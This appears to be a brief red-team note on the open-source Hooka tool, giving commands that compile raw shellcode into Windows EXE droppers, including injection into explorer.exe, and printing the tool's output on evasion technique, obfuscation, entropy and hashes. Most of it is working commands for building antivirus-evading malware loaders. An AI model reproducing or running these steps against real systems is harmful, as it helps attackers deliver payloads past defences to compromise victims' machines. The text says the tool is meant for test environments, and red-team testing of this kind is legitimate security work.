
Use open source malware droppers when playing in testing environments… You don’t want to burn your own dropper when playing around.


  • Can be run in Linux and generate Windows binaries (cross platform compilation)
  • Golang

# simplest command
./build/hooka_linux_amd64 -i ~/webserver/smb.x64.bin -o imdone.exe 

# the more shit you add the buggier it might be... and less likely to run
# glhf

./build/hooka_linux_amd64 -i ~/webserver/smb.x64.bin -o imdone.exe --proc explorer.exe
  _   _                   _              _
 | | | |   ___     ___   | | __   __ _  | |
 | |_| |  / _ \   / _ \  | |/ /  / _` | | |
 |  _  | | (_) | | (_) | |   <  | (_| | |_|
 |_| |_|  \___/   \___/  |_|\_\  \__,_| (_)

[*] Obtaining shellcode from /home/lo/webserver/smb.x64.bin
  > Shellcode is in raw format

[*] Defining evasion techniques...
[*] Using suspendedprocess technique to execute shellcode
[*] Obfuscating variables and functions...
[*] Compiling shellcode loader...
  > Payload format is set to EXE
  > go build -o imdone.exe loader.go
  > 3154432 bytes written to imdone.exe

[+] Loader file entropy: 6.9330213473661955
[+] Checksums:
  > MD5: 6666b187280d31537b083c69631b636c
  > SHA1: 64ff907b7c9d94564ce5857145dd70d8b4761044
  > SHA256: d9b5fc90dcd569ae2f00b7dc7bb1ddeae28e1cacc201628afa7d809061dfe561

[+] Shellcode loader has been successfully generated

